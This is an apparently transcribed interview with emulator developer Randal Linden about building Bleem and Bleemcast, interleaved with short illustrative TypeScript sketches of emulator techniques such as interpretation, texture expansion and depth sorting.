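const PSX_W = 320, PSX_H = 240;   // a typical PlayStation framebuffer resolution
const HOST_W = 640, HOST_H = 480; // target resolution on the PC / Dreamcast side

export function emulateShadedTriangle(cmd: Uint32Array, gpu: HostRenderer): void {
  // Decode the command's intent instead of rasterising into emulated VRAM...
  const verts = [0, 1, 2].map(i => {
    const colour = cmd[i * 2];        // assumed 0x00BBGGRR packed colour word
    const xy = cmd[i * 2 + 1];        // assumed: Y in the high half, X in the low half
    return {
      x: ((xy & 0xffff) / PSX_W) * HOST_W,   // upscale to the host resolution
      y: ((xy >>> 16) / PSX_H) * HOST_H,
      r: colour & 0xff, g: (colour >>> 8) & 0xff, b: (colour >>> 16) & 0xff,
    };
  }) as [PsxVertex, PsxVertex, PsxVertex];
  // ...and let the host card rasterise it with whatever filtering it offers.
  gpu.drawTriangle(verts, /*translucent=*/ false);
}
```

Because the host card does the rasterising, features the original hardware never had, such as higher resolution, filtering and anti-aliasing, come along essentially for free, which is the enhancement effect described above.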
Direct 3D from Microsoft was Direct 3D 1.0 and back then it was very rare for a graphics card that had 3D capabilities to do translucency. They were predominantly aimed at throwing lots of polygons at things but they didn't really do translucency and a lot of games on the PlayStation used translucency to get nice glass effects and smooth shaded effects and things like that. And so it depended on the graphics card what your results were when you were running under Blean. Different graphics cards stored internally the textures in different formats sometimes so what I would send to a graphics card would end up taking a lot more space than the PlayStation itself. And so that's why the graphics cards back then if it had 8 megabytes of memory it was enormous and these days graphics cards have gigabytes, gigs upon gigs of memory and hundreds or thousands of processors. But back then the PlayStation was a technical marvel for how they very carefully fit all the pieces together. And so that was one of I think the challenges in Blean to sort of to emulate the game but to enhance it and to take care of all of the components. Yeah but it's a very nice point right so because you mentioned the PlayStation was really a technical marvel but at the time we okay so I at least didn't understand the PlayStation as well but I did understand Blean was a technical marvel and as I you know as I gained more experience and I gained more insight into the PlayStation Blean became even more amazing right because to be able to do that right because Blean I think it ran on Pentium 150's or 160's or something like that right so and nowadays you can't even imagine something like that the PlayStation was I don't remember something like 50 megahertz I think I don't remember. 25. Yeah okay so. 25 and somewhere 33 and yes it was Sony did a brilliant job but it really was an homage to Sony and the genius of the PlayStation it was always intended as to expand the audience for PlayStation games because there was a handful of 3D games on the PC you had well or two and a half D games you had you know Doom and you had Hexen and Heretic and then you had Quake and there was Descent there was Unreal and so you had a handful of 3D games. Flight simulator never forget flight simulator. 
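On the texture-memory point a moment ago, here is a hedged illustration of why the same texture could occupy far more space on an early PC 3D card than on the PlayStation: a palettised 4-bit texture packs two texels per byte, while many cards wanted 16- or 32-bit texels, so the emulator had to expand it. The format details below are simplified assumptions, not the exact layouts involved.

```typescript
// Simplified sketch: expand a 4-bit palettised (CLUT) texture into 32-bit RGBA texels.
// Layouts are assumptions for illustration; real formats varied per card and per game.
function expandClut4ToRgba32(indices: Uint8Array, palette: Uint32Array,
                             width: number, height: number): Uint32Array {
  const out = new Uint32Array(width * height);      // 4 bytes per texel on the host card
  for (let i = 0; i < width * height; i++) {
    const packed = indices[i >> 1];                  // two 4-bit texels packed per byte
    const index = (i & 1) ? (packed >>> 4) : (packed & 0x0f);
    out[i] = palette[index];                         // assumed 0xAABBGGRR palette entries
  }
  return out;
}

// Rough numbers: a 256x256 4-bit texture is about 32 KB of indices plus a tiny palette on
// the PlayStation side, but 256 KB once expanded to 32-bit, an 8x growth. That is one
// reason an "enormous" 8 MB card could still fill up quickly.
```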
Flight simulator exactly there was there was a bunch of these but you could hold them you know in your hands whereas on the PlayStation there were hundreds of games that were all 3D that had music that had video this was back when the average CD ROM drive was either a 1X or a 2X CD ROM and to have music and video playing in a game was on the PC it was just unheard of you might have a cutscene or something like that that was umpteen megabytes of compressed video data but the PlayStation could do all that in hardware it had a custom chip called the M-Deck for motion I believe it's motion decompression engine it's it's basically um it's basically sort of like motion jpeg um and it could decode little tiny pixel blocks and when you streamed off of a CD to decode these little pixel blocks you could make full screen video um on a on a CD ROM drive that was running at you know 2X speed whereas on the PC it required multiple thousands of dollars worth of PC hardware to be able to do something like that and and here you could get a PlayStation for I want to say $1.99 or something like that so it was it was quite impressive um the way that they chose all of the components a lot of them weren't were so many components Sony being a semiconductor company had all of these chips like they had a CD ROM chip and they had a sound chip they were the ones who made the sound chip for the super nintendo it was a sony sound chip that was in the super nintendo and so they had experience especially working with nintendo I'm sure that you know the original PlayStation was a super nintendo add-on and then Sony decided to go it on their own and the rest is history as they say um but at the time BLEEM really uh was a project that was intended to bring the games all of those hundreds and hundreds of games to the millions and millions of PC users who like I said after you had your quakes and and your dooms and your flight simulator and and so on you you could play per app of the rapper or you could play ridge racer there just weren't a lot of those kinds of games on the PC and BLEEM sort of opened the door to that absolutely absolutely but it also begs the question right so so it was something very the the idea itself right it was very unique right it's like you you know people make games for computers which is you know we've been used to it for like at that point like late 90s like maybe like 10 20 years I guess right where the where the market really picked up and and and all of a sudden you have this idea I'm gonna make a commercial you know video game emulator for the PlayStation for the PC right it's like I don't know I just how did that come about right so how did it come about I was working on PC software at the time and had seen the PlayStation owned a PlayStation and Ridge racer one of my favorite games that's a very very old school game Ridge racer and and I thought to myself well if a PC is capable of running quake and it's capable of running doom certainly it's capable of running Ridge racer not that Ridge racer is by any stretch a simple game because it actually does some fairly complicated things internally which I didn't know until I was developing BLEEM itself but it just seems like sort of the planet sort of aligned and it said yes this is a good idea that that especially because when I first put the Ridge racer disk into the PC it recognized it I was stunned because there was there was a program there was graphics files there was data and it just seemed like a perfect fit to make it possible to play 
this game on at the time a low-end PC because most people didn't have high-end PCs but the hardware I knew would be capable of doing it it would just take an awful lot of work to get it done. Right then so this is a very good you know like they call it like a segue right so because when you put the city in the PC right so because I did the exact same thing the only thing is I stopped after that this I was amazed that the PC could read it right I had these I must do. Right like this Sony how can they mix it whatever right there. Well you want to think how can they make such a mistake but it wasn't really a mistake because it was actually brilliant Sony made it possible. It was a regular CD in the PlayStation so that it was a very efficient inexpensive component the Sony CD drives were everywhere and they I'm sure were thinking we've got the PlayStation console and the magic is in the console which it is it's got all of these custom chips that do the sound and the motion decoding and it's got the GTE for doing graphics transformations and rendering and it's got its own VRAM and it's a really sort of a dedicated arcade machine in a box whereas at the time PCs really didn't do that they they you had games on PCs and you had games for many years on PCs but the PC wasn't really targeting gamers the way it sort of turned out in the long run now now if you're a gamer you're either a hardcore console gamer or you're a PC gamer and there's the whole battle there between the two but this was just at the start where you wouldn't see the diversity of games on the PC until years later but there was on Nintendo, Super Nintendo, PlayStation, Sega Genesis, all of these older consoles that the hardware inside them was very simple compared to the PC the technology in PCs was very advanced but it wasn't really designed for graphics it wasn't really most people probably these days don't even think about oh yeah I'm gonna get this particular GPU and especially a sound card back then there was a dozen or so different sound card manufacturers did you have a creative sound blaster did you have the Disney sound plus did you all of them? Oh yeah, Hercules or whatever. Oh no exactly and the graphics ultrasound was another one these days when you buy a PC it sort of comes with all that stuff and unless you're a gamer or you're a hardcore graphics guy you don't really think about gee I want to put this particular graphics card into my machine unless you're building a custom machine but back then PCs you really have to think about it you know do I want a diamond graphics card or a voodoo graphics card or something else from 3DFX and what kind of sound card do I want and do I want a 2x CD-ROM or a 4x CD-ROM and these days CD-ROMs are even fading away because everything is all digital and it's all being streamed. Yeah, that's what I mean. So I remember if I remember correctly at least from a different interview you mentioned the next step after you know you put the CD in you went and to a bookstore and you got a MIPS manual. I did, I went to an actual, it was an actual bookstore because they still had them back then although I think Barnes and Noble is still around these days and they still sell books but it was about this thick and it was an actual MIPS R3000 manual. Okay. And I started looking through the op codes and reading the manual and sure enough when you take a look at the files that are on the disk it's actual code. There was no encryption, there was no obfuscation, nothing? 
No obfuscation, no encryption, no decryption, no nothing. It was here's an executable and if you looked at the executable and you looked at the op codes you could even see text often. I don't remember specifically which ones but there are a number of games that shipped with debug symbols and bugging information and yes all sorts of stuff like that which for somebody who's trying to reverse engineer a system it's like wow that's a gold mine all that information that's there but yes this was before the days where everything is encrypted and everything is hashed and everything is secure and reverse engineering starts with trying to figure out how on earth you're going to make it read a disk or what public key was used to encrypt and sign the digital manifest of something else and back then it was you know stick the disk into the PCCV wrong drive and wow there's the whole program the magic happens between reading the contents of the disk and making it actually play the game. There's a lot of steps in between the two but yeah I went to the bookstore got the MIPS manual and thankfully as it turns out didn't have to implement everything I implemented BLEEM I sort of described it on an as needed basis literally I would run a program I wrote the initial part of the emulator that it was a an interpretive emulator that basically means that I take each op code and I interpret the op code and when I came across an op code that I hadn't written support for yet I would implement it so I didn't actually write a complete processor there were op codes that didn't get implemented until months into development because no games that I was using for testing and for development and for debugging happened to use those particular op codes and so when the game was running it would just all of a sudden stop and it would in the debugger I used a debugger a very low level debugger called softice yeah it's a very very old school because the whole program was was written in x86 assembly again assembly again yeah for speed yeah and so when I came across an unimplemented op code it would just stop and then I would go ahead and I would write the code to implement the op code and then they would get a little further and get a little further get a little further and the very first time the program didn't stop I knew it was running it didn't crash because I could stop the program and see yes it's still executing code but there wasn't really a visual display that's one of the interesting things about the the PlayStation and a lot of systems that are similar to it you sort of send down a list of polygons to render and you just assume that they're going to get rendered there's there's no interaction back and forth between the the the CPU side of things and the GPU side of things at least back then there there really wasn't so like for example Ridge racers got this really beautiful waving flag beautiful you know 20 plus 30 years ago time frame and they just send down polygons and render things and they assume that the flag is being rendered and displayed yeah very udb like exactly so I was able to get a lot of code operational without having to have a lot of components fully operational and running it allowed me to develop especially the graphics side of things as I figured things out because I there was my first experience with with 3d with 3d math with you know why you would want to take two or three points and triangulate and calculate and you know certain numerical values or why it was important to know that here's the set of 
points and here's an average of the points, because you're trying to do collision or you're trying to do Z-sorting, for example, where it's required by the program to render things in the right order. And so the PlayStation didn't have a Z-buffer, and a Z-buffer, for people that don't know, allows you to specify depth: effectively it is, for each pixel that you draw, how far away from the eye that particular pixel or texture or polygon is supposed to be. And so what the PlayStation did is it assumed you sorted your polygons yourself, what's known as the painter's algorithm. That's why things would so often flicker: they would flicker because they got closer or further to the camera than another polygon that was right next to it, and in one frame this one would be closer and in the other frame that one would be closer, and so you would see this little bit of flickering there. Well, part of this lack of symbiosis, this lack of knowledge that yes, the graphics are rendering with pixel precision, is what allowed Bleem to enhance the graphics in the first place. I know when a game is sending down a polygon, and the game doesn't really care, most games didn't really care, how the polygon actually made it to the screen, and so that allowed me to separate out the CPU component from the graphics component and the motion decoding component and the sound component and all of these different things, because although they were interrelated, they weren't in lockstep where there was a lot of dependency. That's one of the flaws of doing emulation the way that Bleem does it: certain games won't run under Bleem because, for example, they know when they're rendering the triangles and the polygons and it's going into video RAM, and they're then using the results of that video RAM rendering to do special effects like fogging and blurring and certain things like that, and because Bleem didn't really emulate VRAM the same way the PlayStation graphics engine wrote and processed video graphics, there are just some things that Bleem would never be able to do. I wouldn't say never, right? There are ways around it, there are solutions to it, but they're complicated and there's a lot of overhead involved. And on balance, the net result of being able to say, here's the game and it was running at 320 by 240 but now it runs at 640 by 480 with full-screen anti-aliasing, multi-sampling and anisotropic filtering, and it does all these neat things, and oh yes, it's running on the Sega Dreamcast instead of on the PlayStation One, there's a lot to be said for the magic of being able to take a disk from one platform and run it on another platform and have the enhancements to it.
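Going back to the interpreter described a little earlier, here is a minimal sketch of the "implement opcodes as you hit them" workflow: a fetch/decode/execute loop with a handler table, where an unimplemented opcode simply stops execution so the missing handler can be written. It is TypeScript rather than the hand-written x86 of the real thing, the Cpu interface and handler names are assumptions, and branch delay slots and exceptions are ignored for brevity; only the MIPS bit-field layout is taken from the real instruction set.

```typescript
// Minimal interpretive-emulator sketch (assumed structures; not BLEEM's implementation).
interface Cpu { pc: number; gpr: Int32Array; read32(addr: number): number; }

type OpHandler = (cpu: Cpu, instr: number) => void;
const handlers: Array<OpHandler | undefined> = new Array(64);

handlers[0x0f] = (cpu, instr) => {                    // LUI rt, imm16
  const rt = (instr >>> 16) & 0x1f;
  cpu.gpr[rt] = (instr & 0xffff) << 16;
};
handlers[0x09] = (cpu, instr) => {                    // ADDIU rt, rs, imm16
  const rs = (instr >>> 21) & 0x1f, rt = (instr >>> 16) & 0x1f;
  cpu.gpr[rt] = (cpu.gpr[rs] + ((instr << 16) >> 16)) | 0;  // sign-extended immediate
};

export function step(cpu: Cpu): void {
  const instr = cpu.read32(cpu.pc);
  const op = instr >>> 26;                            // primary opcode field, bits 31..26
  const handler = handlers[op];
  if (!handler) {
    // The equivalent of dropping into the debugger: stop, implement the opcode, rerun.
    throw new Error(`unimplemented opcode 0x${op.toString(16)} at pc 0x${cpu.pc.toString(16)}`);
  }
  handler(cpu, instr);
  cpu.pc = (cpu.pc + 4) | 0;                          // delay slots ignored in this sketch
}
```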
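And since the painter's algorithm came up just above, the sketch below shows the depth-sorting idea in miniature. With no Z-buffer, each primitive gets a single representative depth (here simply the average of its vertices' Z values, one common choice) and the list is drawn back to front; two nearby polygons whose average depths trade places from frame to frame are exactly the flicker being described. The structures are illustrative assumptions.

```typescript
// Painter's-algorithm sketch: sort primitives by one representative depth, draw far to near.
interface Vec3 { x: number; y: number; z: number; }
interface Polygon { vertices: Vec3[]; draw(): void; }

function averageDepth(p: Polygon): number {
  // One depth value per polygon: with no per-pixel Z-buffer, ties and interpenetrating
  // polygons can sort differently from frame to frame, hence the flicker.
  return p.vertices.reduce((sum, v) => sum + v.z, 0) / p.vertices.length;
}

export function renderFrame(polygons: Polygon[]): void {
  [...polygons]
    .sort((a, b) => averageDepth(b) - averageDepth(a))  // farthest first
    .forEach(p => p.draw());                            // nearer polygons paint over farther ones
}
```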
It really... yeah, okay, yeah. I've always, you know, and I mentioned this I think in the questions as well, but I've always wanted to ask about this: why did you choose to do Bleemcast instead of, like, a Bleem for, you know, the PlayStation 2? Because around the same time the PlayStation 2, I think it came out, I don't remember exactly, 2002, 2000, 2001, something like that, right? Yep, yep. And you being you, right, you know, loving your technical challenges. So yes, that's true, that is very true. I love a technical challenge, that's really what drives me when it comes to a project. I like being able to do the things that people say, oh, this is not possible, this can't be done, and then go ahead and accomplish it. And the PlayStation 2 had just been announced and the Sega Dreamcast was already available, and it was actually my business partner, his name was David Herpelsheimer, who suggested Bleemcast in the first place, and he just thought, we both thought, that the Dreamcast was a perfect machine. It was very, very well designed, it reminded me sort of of an advanced PlayStation. And so I did some research into the processor and some of the technology behind the Dreamcast and decided that yes, it had all of the components and hardware necessary to make Bleem operational on a totally different platform. It was, to my knowledge, one of the very first times that a game console game was playable, with enhancements, on a competitor's console at the same time that the original console was still available and in the market. It, I think, was unique. Definitely, definitely, and don't get me wrong, I love the Dreamcast, it's one of my favorite consoles of all time. It's actually the only Sega console I own, and the reason for that is it's also the only Sega console I love, and I was very, you know, sad to see it not gain as much success as it deserved. Yeah, right. So, and there's a funny story, so not about me but about you, right? So in one of the interviews as well you mentioned that you guys were actually invited to Sega, right? We were, we were invited to Sega. This is amazing, but sorry, yeah. No, no, and I regret declining the invitation. David went, and Scott, I think Scott Carol, who is one of our attorneys, he went to Sega, and they flew them to Japan and they met with all of the top brass at Sega and said, effectively, this is what we want to do. And it was a tremendous opportunity and a tremendous honor, and Sega ultimately said, well, we can't really support you officially, we can't really let you publish, you know, on the Dreamcast, but here's a development system and here's some low-level documentation and here's the phone numbers and email addresses of technical people in case you happen to have any questions, but we can't really support what you're going to do. And by the way, there's this thing called MIL-CD that was only available in Japan at the time, and we'll let you figure out what that means. And so I reverse engineered the Sega Dreamcast, because the hardware system that we got on loan from Sega, it was called Katana, didn't have the MIL-CD support. Now, for people that don't know what MIL-CD is: MIL-CD is a regular CD-ROM that was intended for, like, Japanese karaoke. MIL stands for, I want to say, Multimedia Interactive something, and it was basically a regular CD that the Dreamcast could boot. So there was this way of making manufactured discs that could run software on the Dreamcast that didn't have to be officially licensed, approved or manufactured by Sega,
and so it was because of that that Bleemcast came to be. David made a little piece of hardware to dump the ROM from the Sega retail console, because the Dreamcast development kit didn't support MIL-CD. In fact, they removed all the code that had to support reading regular CD-ROM discs from the development systems, they removed it all, so nobody had any idea that the Dreamcast could read regular CD-ROMs and run games on them. Well, this is where history sort of branches: at the same time that we realized that the code had to be in the retail version of the boot ROM, another group in Europe called Utopia got a hold of a Sega development software kit, and one of the programs that was in the software kit was a scrambler. It was effectively a little tiny tool that took a program and jumbled it up in a particular order, so that when you looked at the program it was all mixed up, and if you put the program in this mixed-up order onto a regular CD-ROM, the Dreamcast would boot it. That was the piece of code that was missing from the Katana hardware development kits given out to all the developers. So when we showed up at E3 with Bleemcast running on the Sega Dreamcast, people thought that Sega was supporting us, but in fact they weren't. We had reverse engineered their development system and their retail consoles, and at the same time this other group of hackers reverse engineered and figured out the same kind of thing. And it was sort of bittersweet, because while MIL-CD allowed BLEEM and BLEEMcast to exist, it also opened the door for piracy on the Dreamcast, which ultimately was one of the things I think that killed the platform. Yeah, maybe, I don't know. I do remember that, and I do remember partaking in that, but those were different times, we were younger, we had less money and a lot of things. It's no excuse, of course, but. Well, it is what it is. I vaguely recall that, and I don't remember the exact numbers, but the original BLEEM on the PC was on a copy-protected disc, and the copy protection was broken within a day or less of it being released. And the intention was, because the software emulation was a work in progress, the intention was that you would download the latest version from our website, you put the BLEEM disc in, the two would talk to each other, and then you would put in a PlayStation disc, and so this allowed us to update the software often and frequently. I remember looking one day and wondering about piracy and BLEEM and how many pirated copies of BLEEM were out there, because there were certain things that BLEEM did if it detected that it was running a pirated version, and one of the technical support questions that our technical support people asked was a way of finding out whether they were running a real version of BLEEM or a pirated version. And I vaguely remember that we had 30 times the number of downloads compared to how many discs were actually sold. So if we sold a thousand discs, we ended up having 30,000 downloads of the BLEEM software, even though we really should have only had a thousand. So it sort of opened my eyes to piracy, and as I said, on the Dreamcast, where you could get most any game and duplicate it on a regular CD-ROM, it was the very same technology that made BLEEM, BLEEMcast possible, but it also helped, I think, hurry along Sega's demise. They just couldn't compete. Yeah, but instead Sony got mad at you, not Sega.
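To illustrate what a tool like that scrambler does conceptually: it applies a fixed, invertible reordering to the blocks of an executable so that the image on disc looks jumbled, while the console's boot code knows how to undo the ordering when it loads it. The sketch below is emphatically not Sega's actual MIL-CD scrambling algorithm; the block size and the permutation are made-up placeholders chosen only to show the scramble/descramble symmetry.

```typescript
// Illustrative block scrambler/descrambler. The permutation below is a placeholder,
// not the real MIL-CD ordering; only the overall idea matches the description above.
const BLOCK = 32; // assumed block size in bytes

function blockOrder(count: number): number[] {
  // A fixed, invertible shuffle of block indices (a multiplicative hash as a toy key).
  const keyed = [...Array(count).keys()].map(i => ({ i, key: (i * 2654435761) >>> 0 }));
  keyed.sort((a, b) => a.key - b.key);
  return keyed.map(e => e.i);
}

export function scramble(image: Uint8Array): Uint8Array {
  const count = Math.ceil(image.length / BLOCK);
  const order = blockOrder(count);
  const out = new Uint8Array(count * BLOCK);
  order.forEach((src, dst) => out.set(image.subarray(src * BLOCK, src * BLOCK + BLOCK), dst * BLOCK));
  return out;
}

export function descramble(image: Uint8Array): Uint8Array {
  const count = image.length / BLOCK;
  const order = blockOrder(count);
  const out = new Uint8Array(image.length);
  order.forEach((src, dst) => out.set(image.subarray(dst * BLOCK, dst * BLOCK + BLOCK), src * BLOCK));
  return out;
}
```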
Sony got mad at SEGA at D3 SEGA at their keynote mentioned BLEEM and BLEEM got a standing ovation from everybody who was attending SEGA's keynote Sony was not happy. They were not thrilled and I think partially it's because the licensing the way that games are licensed it's what's known as the Razors and Blades model where you buy a razor and the razor is inexpensive but you have to keep buying blades well the razor is the PlayStation console or the Xbox console and the blades that you have to keep buying are the games. Well if you could just go to a store and rent a game and play it on something other than the original hardware then it meant that the original hardware wasn't needed anymore and like I said I think one of the reasons that Sony was not happy with us was because people would be playing games on the PC and they'd be playing the games enhanced compared to playing it on a PlayStation. Yeah okay I'll try not to talk too much about Sony about this particular part. I have the greatest respect for Sony. Certain areas yes not this one in certain areas yes they could have come up with a better solution I think but. I think so too I wish that I wish they had seen the possibilities. I think and I don't know how the two companies are doing I think Sega saw that they could be a better software company than a hardware company and so Sega's still around today and they make great games and their games are playable on all sorts of platforms rather than on just one platform. I think especially with streaming services I think we're going to be seeing a shift where the home console isn't really a thing in the future. You subscribe to a service and the service can afford to have racks upon racks upon racks of really really really really high end hardware and the throughput the internet throughput is so high that it's just like you're playing it on a console that's that's sitting in your living room but instead of costing five or six hundred dollars to buy the console and then sixty dollars a game you're you're paying your monthly subscription fee. I think that's that's the model of where things are going who it is that ends up making the hardware I think there's probably going to be a shake out there's only going to be one or two companies that end up doing that but it would certainly put an end to console wars and things like that right now there's three or four different contenders for that market space and I still think there's a long way to go but I but I think that it's sort of ultimately the next evolution of where gaming is going to be where emulation is emulation is less critical because the hardware is more ubiquitous if that sort of makes sense. Sort of everywhere just like you get apps and you've either got an iPhone you've got an Android phone but apps these days they run on both phones and it doesn't matter what phone you've got you can still not not that the games are spectacular on either phones frankly but I think Sega I think Sega saw the writing on the wall and realized hey you know what we've we've got some great intellectual property some great characters some really great video games and and we're better as a software company than we are as a hardware company and I don't know if Microsoft and Sony and are there quite yet Google I think is going in the opposite direction where they are sort of got their hardware their Google branded hardware but then they've got their Stadia service. Yeah. This is sort of off topic from emulation. 
No but and about Microsoft I think Microsoft is actually like moving backwards I mean they are they're a software company and they got into the hardware game late and then they're competing the same way the other hardware companies are competing well that's nuts. It works for them and I mean they make a lot of money so they should be they are right and I'm wrong probably but you know. No you never know. I worked at Microsoft for almost 10 years. I worked on the Xbox 360. I was in the software development group. So I worked on what was called the XDK the development kit for the Xbox 360. I worked I was on a team that helped develop Kinect. Love it. I'm very sad and to see Kinect not doing as well as but I love Kinect. It has a love it had a lot of potential and I still use it or my kids use it but sorry carry on carry on sorry. No no no I think that I vaguely remember something like hearing that when Kinect came out it was the most popular accessory hardware accessory for a game console ever and it was very unique technology but I worked on Kinect. I also worked on Microsoft Band. That was the think Fitbit from Microsoft. It was a health and fitness band that did all sorts of things way way ahead of its time but Microsoft decided that that really wasn't the area they wanted to get into and so they closed down the Microsoft Band group and they offered a severance package and I said yes I'll take the severance package and take some time off and go back to my roots and that's when I developed Cyboyd. It's a 3D think Quake basically running on low end on Amazon, Fire TV stick, Fire tablets, Android devices and now working on.
|
In this interview/conversation, acclaimed emulator programmer Randal Linden takes us on a journey down the depths of reverse engineering and emulator development. Rather than editing this conversation to fit a smaller time-slot, it is split across 3 parts, with a Live Q&A at the end of part 3. Part 1 highlights: Doom FX for the SNES Bleem! Reverse engineering the MIPS R3000 The Sega Dreamcast
|
10.5446/53642 (DOI)
|
I'm very curious how we did this with Windows, because Windows would have gotten in the way, I think, right? It does, and it did. Okay. And BLEEM did a bunch of ugly tricks. And I say ugly, but BLEEM ran portions of its code in what's known as Ring Zero through a couple of backdoors and bugs in Windows. Yeah. And it did. And it did. Yes, effectively. The dynamic recompiler generated optimized x86 code, then flushed caches and... it used Windows. But yes, that's why BLEEM never ran on Windows NT: because the backdoors and the hacks don't work on NT. Okay, okay. That's a good one. And you mentioned jitting. And so did you also use the same strategy? Like, you know, you profile the hotspots and then you recompile that in a certain way and then you decompile. Okay. No, no, what it did is it literally did dynamic recompilation while the program was running. So it was effectively a just-in-time, a JIT compiler, that knew which portions of the code had executed and which portions of the code hadn't yet executed. And when it went to execute them, it compiled them. Then it ran. All on the fly. Yeah, okay. That's very interesting. That's very elegant and beautiful. I mean, thank you. No, it's complicated code. Yeah, exactly. And it's complicated code for, for... yeah, how do I say this, you know, it's like straightforward for a purpose, right? It's not there for fun. It's not there for show. You have a purpose, you do it, you do it very well, and the result is excellent, right? And this is like the discussion from, yeah, or the discussion we didn't go into about, you know, the difference between high level emulation and, like, low level emulation, right? And high level: we want to run this game. We want to run it well, we want to, you know, enhance the game. Boom, right? So that's how it goes. And the other way, which is also very nice and that's usually what you do for a hobby project, right? Yeah, sure, you want to emulate every, like, you know, illegal opcode and, and like the thing with the V-blank you mentioned. Yes. So, so yeah, dynamic compilation. Nowadays, everybody does it of course because... Yes, because you can, because it is a commonplace technique. BLEEM is a blend of low level emulation and high level emulation. BLEEM sort of crosses the line between the two. There's the low level emulation of the processor, but higher level emulation of the graphics co-processor and of the motion decoder. And then there's the high level emulation of the sound chip, and high level emulation of the BIOS, for example. And then sort of a weird mix of both. And that's what allowed it to, that's why on the Dreamcast, you could use the Sega Dreamcast VMU to store PlayStation save games. Yeah, okay. Yes, that's true. Yeah, sorry. Yeah, okay. I'm thinking. Yeah. Yeah, okay, that is hard. So, yes, small question or so. So when you guys, like, did you at any point get a PlayStation development kit? No. Why not? I read... Because for obvious reasons we wanted to keep everything completely clean. Clean room. Didn't want Sony to turn around and say, well, you've had access to all of our whatever technical information and hardware and so on. And I'm sure that if we had asked, no, so we just sort of did it independently. Yeah, okay. All right. I think the, yeah, I have too many questions but you know, I told myself I'll try to keep this two hours and I think we're more than two hours now. 
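To make the "compile it only when it is about to run" idea above a little more concrete, here is a minimal sketch of the kind of dispatch loop a dynamic recompiler is typically built around. This is purely illustrative and is not BLEEM's code; every name in it (translate_block, guest_next_pc, the cache size) is hypothetical.

/*
 * Illustrative dynamic-recompiler dispatch loop (hypothetical, not BLEEM's source).
 * The first time a block of guest code is about to execute, it is translated to
 * host code, cached, and reused on every later visit.
 */
#include <stdint.h>
#include <stddef.h>

typedef void (*host_block_fn)(void);      /* entry point of translated host code   */

struct block {
    uint32_t      guest_pc;               /* guest address the block starts at     */
    host_block_fn code;                   /* translated code; NULL = not done yet  */
};

#define CACHE_SLOTS 4096                  /* naive direct-mapped translation cache */
static struct block cache[CACHE_SLOTS];

/* Hypothetical back end: reads guest instructions starting at 'pc', emits host
 * machine code into an executable buffer, and returns its entry point.          */
extern host_block_fn translate_block(uint32_t pc);

/* Hypothetical: guest program counter after the last executed block ended.      */
extern uint32_t guest_next_pc(void);

static host_block_fn lookup_or_translate(uint32_t pc)
{
    struct block *b = &cache[(pc >> 2) % CACHE_SLOTS];
    if (b->code == NULL || b->guest_pc != pc) {   /* never seen (or slot reused)  */
        b->guest_pc = pc;
        b->code     = translate_block(pc);        /* compile it just in time      */
    }
    return b->code;                               /* already compiled: reuse it   */
}

void run_guest(uint32_t entry_pc)
{
    uint32_t pc = entry_pc;
    for (;;) {
        lookup_or_translate(pc)();                /* execute the translated block */
        pc = guest_next_pc();                     /* continue wherever it ended   */
    }
}

An interpreter, by contrast, would decode and perform one guest instruction per loop iteration instead of jumping into a cached, already translated block.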
So, so let's say I just have one more question. And after that, you can talk about anything you want and we will see. I have all the time in the world, right, so I can sleep; like I said, I'm too excited to sleep, so no problem, I've got lots of time. Like I said, I blocked off my whole afternoon. So we can just keep talking. And edit. Never mind portions. What, well, actually I'm thinking, because this year FOSDEM is virtual. And they said, because usually at FOSDEM when you have a development room, you say, okay, I want it for like half a day, a day, because of a physical location. But this year they said, so everybody's virtual, so in principle you can have as long as you want. So, because it fits between 10am and 6pm. So technically speaking, we have two days, right, and we already have, exactly, right, so. No, but it's like, this is too much to talk about, this is just, this is. My pleasure and my distinct honor to be able to talk at length. So I'm always amazed somebody has any interest in what I have to say. And so, if people want to hear, then I'm more than happy to talk. I'm always amazed at people that don't have interest in these kinds of things, and people like you, right. And to give you a short example, I was trying to explain to my wife: I have this amazing, you know, call I have to make, and I'm trying to explain to her why, and my wife is the least technical person on earth I think, right, so it didn't register with her, but my enthusiasm did, so she's happy for me. But that's about it, right, but I mean. Yeah, I mean, so, because. So yeah, so for you there is, for example, the source code of doom, right, but BLEEM for obvious reasons wasn't released. So, you see, this kind of interaction is more useful than the source code itself, right, because source code shows you the end result; it doesn't tell you about the journey. It doesn't tell you about all the stuff you went through, right, and this is amazing, so, right, so. So if I end up, or we end up editing this, the full video should be posted somewhere, and this will be done of course with your permission and such, right, because I think somebody will find something useful even in one of the jokes we made. And hopefully we won't be sued by Sony, right, and, or, I don't think we made anybody else mad. I mean, but especially Sony, that's not good, but. But one thing I was really curious about, and this is, it's basically, right, so: what was actually next for BLEEM, right, before it stopped? So the things you had in your mind you wanted to implement, right, and I'm not sure if you can talk about this or not, but. The next set. We're going to do more BLEEM for Dreamcast. Final Fantasy 7. Spyro the Dragon, Crash Bandicoot. Crash is one of those games that's very known for, how do I say this politely. There was recently one of the creators of Crash, he did like a video for Ars Technica, and he mentioned all the stuff they did to get the game working. And I'm not really certain, most of the stuff is not the official way of doing things on the PlayStation, so it would have been a very. Yeah, you're exactly. That's what I'm preaching for you. Yeah, yeah. Yes. Yes, that's exactly why I think that it would have been one of the great, great games. Also one of my favorites was MediEvil. Because the graphics, the caliber of the game was just so, so high. It's a shame the Dreamcast died. I still have my Dreamcast. 
I don't use it but I do have it. I think a year ago or two years ago. Excuse me. There was something on the internet like like a hype because the website Dreamcast to was registered by Sega or something like that. And everybody was hopeful, but we haven't heard anything yet so who knows who knows. Everything is possible. Everything is possible. Everything is possible. And recently Shenmue 3 came out. No, I know Shenmue was one of my favorite games ever me to me to. So, it was the reason I got it. No, it wasn't a reason to cut the green cuts but that's something else. And with a for BLEEM, were there any like things on the roadmap for BLEEM, you know, because, like you said you started to interpret it, then compiled, re compiled and then jitted, so to speak. Was there like something after that. Yep, give me one second. Oh, sorry. Sorry. No problem. At that point. BLEEM had largely run its course. And by that I mean it was a challenge. How can I put this. It was a challenge to sell. Because stores were concerned about carrying the product. And so BLEEM for the PC sort of had run its natural course and then there was Connectix Virtual Game Station. And so we were at that point shifted and focused mostly on BLEEM for Dreamcast. And so the next set of games that we were going to do were Final Fantasy 7, Spyro, those games, because they were, we wanted games that were the pinnacle of each of their genres. Yeah, okay. But that's that's more from a business point of view and from the technical challenging point of view. What was your next Mount Everest so to speak. My next one was as it turns out to be Cyboyd. When I say, you know, think quake. It's a full 3D engine that was written. There is a video. There's a video online that shows I had it running on a Game Boy Advance. So yeah. Okay. It used a lot of self modifying code. It was all optimized arm assembly. Oh, we're talking assembly again. Okay. Yes. As a matter of fact, Cyboyd, you can get the game on Android 